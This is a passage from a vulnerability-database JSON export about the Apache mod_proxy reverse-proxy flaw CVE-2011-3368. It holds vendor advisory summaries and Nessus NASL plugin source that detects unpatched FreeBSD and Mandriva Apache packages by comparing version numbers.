5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-05T07:45:57", "description": "A security bypass vulnerability has been reported in Apache HTTP Server.", "cvss3": {}, "published": "2012-03-05T00:00:00", "type": "checkpoint_advisories", "title": "Apache HTTPD mod_proxy Security Bypass (CVE-2011-3368)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2022-07-05T00:00:00", "id": "CPAI-2012-077", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2021-10-16T02:26:05", "description": "Apache HTTP server project reports :\n\nAn exposure was found when using mod_proxy in reverse proxy mode. In certain configurations using RewriteRule with proxy flag, a remote attacker could cause the reverse proxy to connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to attacker. There is no patch against this issue!", "cvss3": {"score": null, "vector": null}, "published": "2011-11-15T00:00:00", "type": "nessus", "title": "FreeBSD : Apache 1.3 -- mod_proxy reverse proxy exposure (d8c901ff-0f0f-11e1-902b-20cf30e32f6d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache", "p-cpe:/a:freebsd:freebsd:apache%2bipv6", "p-cpe:/a:freebsd:freebsd:apache%2bmod_perl", "p-cpe:/a:freebsd:freebsd:apache%2bmod_ssl", "p-cpe:/a:freebsd:freebsd:apache%2bmod_ssl%2bipv6", "p-cpe:/a:freebsd:freebsd:apache%2bssl", "p-cpe:/a:freebsd:freebsd:ru-apache%2bmod_ssl", "p-cpe:/a:freebsd:freebsd:ru-apache-1.3", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_D8C901FF0F0F11E1902B20CF30E32F6D.NASL", "href": "https://www.tenable.com/plugins/nessus/56816", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56816);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-3368\");\n\n script_name(english:\"FreeBSD : Apache 1.3 -- mod_proxy reverse proxy exposure (d8c901ff-0f0f-11e1-902b-20cf30e32f6d)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Apache HTTP server project reports :\n\nAn exposure was found when using mod_proxy in reverse proxy mode. In\ncertain configurations using RewriteRule with proxy flag, a remote\nattacker could cause the reverse proxy to connect to an arbitrary\nserver, possibly disclosing sensitive information from internal web\nservers not directly accessible to attacker. There is no patch against\nthis issue!\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://httpd.apache.org/security/vulnerabilities_13.html\"\n );\n # http://seclists.org/fulldisclosure/2011/Oct/232\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/fulldisclosure/2011/Oct/232\"\n );\n # https://vuxml.freebsd.org/freebsd/d8c901ff-0f0f-11e1-902b-20cf30e32f6d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60d9264c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache-1.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache<1.3.43\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ssl<1.3.43.1.59_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ipv6<1.3.43\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_perl<1.3.43\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl<1.3.41+2.8.31_4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+ipv6<1.3.41+2.8.31_4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-apache-1.3<1.3.43+30.23_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-apache+mod_ssl<1.3.43+30.23_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:59:45", "description": "A vulnerability has been discovered and corrected in apache :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial \\@ (at sign) character (CVE-2011-3368).\n\nPackages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149 products_id=490\n\nThe updated packages have been patched to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-10T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : apache (MDVSA-2011:144)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:apache-base", "p-cpe:/a:mandriva:linux:apache-devel", "p-cpe:/a:mandriva:linux:apache-htcacheclean", "p-cpe:/a:mandriva:linux:apache-mod_authn_dbd", "p-cpe:/a:mandriva:linux:apache-mod_cache", "p-cpe:/a:mandriva:linux:apache-mod_dav", "p-cpe:/a:mandriva:linux:apache-mod_dbd", "p-cpe:/a:mandriva:linux:apache-mod_deflate", "p-cpe:/a:mandriva:linux:apache-mod_disk_cache", "p-cpe:/a:mandriva:linux:apache-mod_file_cache", "p-cpe:/a:mandriva:linux:apache-mod_ldap", "p-cpe:/a:mandriva:linux:apache-mod_mem_cache", "p-cpe:/a:mandriva:linux:apache-mod_proxy", "p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp", "p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi", "p-cpe:/a:mandriva:linux:apache-mod_reqtimeout", "p-cpe:/a:mandriva:linux:apache-mod_ssl", "p-cpe:/a:mandriva:linux:apache-mod_userdir", "p-cpe:/a:mandriva:linux:apache-modules", "p-cpe:/a:mandriva:linux:apache-mpm-event", "p-cpe:/a:mandriva:linux:apache-mpm-itk", "p-cpe:/a:mandriva:linux:apache-mpm-peruser", "p-cpe:/a:mandriva:linux:apache-mpm-prefork", "p-cpe:/a:mandriva:linux:apache-mpm-worker", "p-cpe:/a:mandriva:linux:apache-source", "cpe:/o:mandriva:linux:2009.0", "cpe:/o:mandriva:linux:2010.1", "cpe:/o:mandriva:linux:2011"], "id": "MANDRIVA_MDVSA-2011-144.NASL", "href": "https://www.tenable.com/plugins/nessus/56428", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:144. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56428);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"MDVSA\", value:\"2011:144\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache (MDVSA-2011:144)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in apache :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial \\@ (at sign) character (CVE-2011-3368).\n\nPackages for 2009.0 are provided as of the Extended Maintenance\nProgram. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149 products_id=490\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-htcacheclean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_authn_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_disk_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_file_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_mem_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_reqtimeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_userdir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-peruser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-base-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-devel-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-htcacheclean-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_authn_dbd-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_dav-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_dbd-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_deflate-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_disk_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_file_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_ldap-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_mem_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_proxy-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_proxy_ajp-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_ssl-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_userdir-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-modules-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-event-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-itk-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-peruser-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-prefork-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-worker-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-source-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-base-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-devel-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-htcacheclean-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_authn_dbd-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_dav-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_dbd-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_deflate-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_disk_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_file_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_ldap-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_mem_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy_ajp-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy_scgi-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_reqtimeout-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_ssl-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_userdir-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-modules-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-event-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-itk-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-peruser-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-prefork-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-worker-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-source-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", reference:\"apache-base-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-devel-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-htcacheclean-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_authn_dbd-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_dav-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_dbd-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_deflate-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_disk_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_file_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_ldap-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_mem_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy_ajp-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy_scgi-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_reqtimeout-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_ssl-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_userdir-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-modules-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-event-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-itk-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-peruser-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-prefork-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-worker-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-source-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T18:27:09", "description": "From Red Hat Security Advisory 2011:1392 :\n\nUpdated httpd packages that fix one security issue and one bug are now available for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting this issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update introduced regressions in the way httpd handled certain Range HTTP header values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 4 / 5 : httpd (ELSA-2011-1392)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd-manual", "p-cpe:/a:oracle:linux:httpd-suexec", "p-cpe:/a:oracle:linux:mod_ssl", "cpe:/o:oracle:linux:4", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2011-1392.NASL", "href": "https://www.tenable.com/plugins/nessus/68377", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:1392 and \n# Oracle Linux 